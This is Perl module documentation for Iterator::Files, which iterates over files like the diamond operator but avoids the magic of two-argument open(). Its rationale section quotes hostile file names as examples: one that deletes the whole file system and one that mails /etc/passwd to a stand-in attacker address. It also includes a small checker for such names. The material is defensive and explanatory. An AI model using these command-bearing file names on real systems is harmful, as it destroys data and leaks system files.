NAME

Iterator::Files - Iterate through the contents of a list of files

SYNOPSIS

    use Iterator::Files;

    my $input = Iterator::Files->new( files => [ "foo", "bar" ] );
    while ( <$input> ) {
        ...
        warn("current file = ", $input->current_file, "\n");
    }

    # Alternatively:
    while ( $input->has_next ) {
        my $line = $input->next;
        ...
    }

DESCRIPTION

Iterator::Files can be used to retrieve the contents of a series of files as if they were one big file, in the style of the <> (diamond) operator.

Just like <>, it returns the records of all files, one by one, as if they were one big happy file. In-place editing of files is also supported.

As opposed to the built-in <> operator, no magic is applied to the file names unless explicitly requested. This means that you're protected from file names that may wreak havoc on your system when processed through the magic of the two-argument open() that Perl normally uses for <>.

Iterator::Files is part of the Iterator-Diamond package.

RATIONALE

Perl has two forms of open(), one with 2 arguments and one with 3 (or more) arguments.

The 2-argument open is magical. It opens a file for reading or writing according to a leading '<' or '>', strips leading and trailing whitespace, starts programs and reads their output, or writes to their input. A filename '-' is taken to be the standard input or output of the program, depending on whether the file is opened for reading or writing.

The 3-argument open is strict. The second argument designates the way the file should be opened, and the third argument contains the file name, taken literally.
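
The difference can be seen with a file whose name ends in a space. The following is a minimal sketch using only core Perl; the file name and the scratch directory are made up for illustration, and it assumes a file system that allows trailing spaces in names (as Unix-like systems do).

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory that is removed when the program exits.
my $dir = tempdir( CLEANUP => 1 );

# A file whose name ends in a space (hypothetical name, for illustration).
my $name = "$dir/foo.txt ";

# Create it with the strict 3-argument form: the name is taken literally.
open( my $out, '>', $name ) or die "Cannot create '$name': $!";
print {$out} "hello\n";
close($out) or die "Cannot close '$name': $!";

# 2-argument open strips the trailing space and looks for ".../foo.txt",
# which does not exist.
my $two_arg_ok = open( my $in2, $name ) ? 1 : 0;

# 3-argument open uses the name exactly as given and finds the file.
my $three_arg_ok = open( my $in3, '<', $name ) ? 1 : 0;
close($in3) if $three_arg_ok;

print "2-argument open: ", ( $two_arg_ok   ? "opened" : "failed" ), "\n";
print "3-argument open: ", ( $three_arg_ok ? "opened" : "failed" ), "\n";
```

Only the 3-argument form is expected to succeed here, because it never interprets the name.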

Many programs read a series of files whose names are passed as command-line arguments. The diamond operator makes this very easy:

  while ( <> ) {
    ....
  }

The program can then be run as something like

  myprog *.txt

Internally, Perl uses the 2-argument open for this.

What's wrong with that?

Well, this goes horribly wrong if you have file names that trigger the magic of Perl's 2-argument open.

For example, if you have a file named ' foo.txt' (note the leading space), running

  myprog *.txt

will surprise you with the error message

  Can't open  foo.txt: No such file or directory

This is still reasonably harmless. But what if you have a file named '>bar.txt'? Now a new file 'bar.txt' is silently created. If you're lucky, that is. If 'bar.txt' already exists, its valuable data is silently wiped out.

When your system administrator runs scripts like this, malicious file names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can be a severe threat to your system.
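
To make the risk concrete, here is a small sketch of a check that flags names which the 2-argument open would not treat as plain file names. The helper looks_magical is hypothetical and not part of Iterator::Files or Perl, and its list of patterns is an approximation rather than an exhaustive description of open's parsing. It only inspects the strings; nothing is opened or executed.

```perl
use strict;
use warnings;

# Hypothetical helper: true if 2-argument open() would interpret $name
# instead of reading a file with exactly that name.
sub looks_magical {
    my ($name) = @_;
    return 1 if $name =~ /^\s|\s$/;             # surrounding whitespace is stripped
    return 1 if $name =~ /^(?:\+?[<>]|\|)/;     # mode prefix, or pipe to a command
    return 1 if $name =~ /\|$/;                 # pipe from a command
    return 1 if $name eq '-';                   # standard input or output
    return 0;
}

for my $name ( 'notes.txt', ' foo.txt', '>bar.txt', 'rm -fr / |', '-' ) {
    printf "%-14s %s\n", "'$name'", looks_magical($name) ? "magical" : "plain";
}
```

A check like this is easy to get subtly wrong, which is one argument for avoiding the magic altogether rather than trying to filter it.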

After a long discussion on the perl5-porters mailing list it was felt that this security hole should be fixed. Iterator::Files does this by providing a decent iterator that behaves just like <>, but with safe semantics.

FUNCTIONS

new

Constructor. Creates a new iterator.

The iterator can be used by calling its methods, but it can also be used as an argument to the readline operator. See the examples in SYNOPSIS.

new takes an optional series of key/value pairs to control the exact way the iterator must behave.

magic => { none | stdin | all }

none applies three-argument open semantics to all file names and does not use any magic. This is the default behaviour.

stdin is also safe. It applies three-argument open semantics but allows a file name consisting of a single dash - to mean the standard input of the program. This is often very convenient.

all applies two-argument open semantics. This makes the iteration unsafe again, just like the built-in <> operator.

edit => suffix

Enables in-place editing of files, just like the built-in <> operator. The suffix is appended to the name of each file to form the name of its backup copy.

Unlike the built-in operator, an empty suffix (which would discard the backup files) is not supported.
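
For comparison, this is a sketch of the built-in behaviour that the edit option mirrors, written with core Perl only. It does not use Iterator::Files, and the file name is made up for illustration. The special variable $^I holds the backup suffix, as the -i command-line switch does.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

my $dir  = tempdir( CLEANUP => 1 );
my $file = "$dir/sample.txt";    # hypothetical file name

open( my $out, '>', $file ) or die "Cannot create $file: $!";
print {$out} "one\ntwo\n";
close($out) or die "Cannot close $file: $!";

{
    # A non-empty $^I turns on in-place editing and names the backup suffix.
    local $^I   = '.bak';
    local @ARGV = ($file);
    while (<>) {
        s/two/2/;
        print;    # while editing in place, print writes to the new file
    }
}

print "backup kept: ", ( -e "$file.bak" ? "yes" : "no" ), "\n";
```

After the loop, sample.txt holds the edited text and sample.txt.bak the original.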

files => aref

The list of files to iterate over. If this is not specified, @ARGV is used.

next

Method, no arguments.

Returns the next record of the input stream, or undef if the stream is exhausted.

has_next

Method, no arguments.

Returns true if the stream is not exhausted. A subsequent call to next will return a defined value.

This is the counterpart of the 'eof()' function (with parentheses): has_next is true as long as 'eof()' would be false.

is_eof

Method, no arguments.

Returns true if the current file is exhausted. A subsequent call to next will open the next file if available and start reading it.

This is the equivalent of the 'eof' function.
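
The two built-in forms that these methods are compared with behave differently, which the following core-Perl sketch illustrates. It uses the built-in <> rather than Iterator::Files, and the file names are made up. eof without parentheses becomes true at the end of each file (the condition is_eof reports), while eof() with parentheses becomes true only at the end of the last file (the point at which has_next stops being true).

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

my $dir   = tempdir( CLEANUP => 1 );
my @files = map { "$dir/$_" } qw(a.txt b.txt);    # hypothetical names

for my $f (@files) {
    open( my $out, '>', $f ) or die "Cannot create $f: $!";
    print {$out} "line 1\nline 2\n";
    close($out) or die "Cannot close $f: $!";
}

my ( $file_ends, $stream_ends ) = ( 0, 0 );
{
    local @ARGV = @files;
    while (<>) {
        $file_ends++ if eof;    # just read the last line of the current file
        if ( eof() ) {          # just read the last line of the last file
            $stream_ends++;
            last;
        }
    }
}

print "file ends: $file_ends, stream ends: $stream_ends\n";
```

With two files, the per-file test fires twice and the whole-stream test fires once.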

current_file

Method, no arguments.

Returns the name of the current file being processed.

LIMITATIONS

Even in list context, the iterator <$input> is currently called only once, and in scalar context. As a result, the following does not work as expected, because it reads a single line instead of all remaining lines:

  my @lines = <$input>;

Use the readline method instead. This reads all remaining lines:

  my @lines = $input->readline;

SEE ALSO

Iterator::Diamond, open() in perlfunc, perlopentut.

AUTHOR

Johan Vromans, <jv at cpan.org>

BUGS

Please report any bugs or feature requests to bug-iterator-diamond at rt.cpan.org, or through the web interface at http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Iterator-Diamond. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.

SUPPORT

You can find documentation for this module with the perldoc command.

    perldoc Iterator::Files

ACKNOWLEDGEMENTS

This package was inspired by a most interesting discussion on the perl5-porters mailing list, July 2008, on the topic of the unsafeness of two-argument open() and its use in the <> operator.

COPYRIGHT & LICENSE

Copyright 2016,2008 Johan Vromans, all rights reserved.

This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.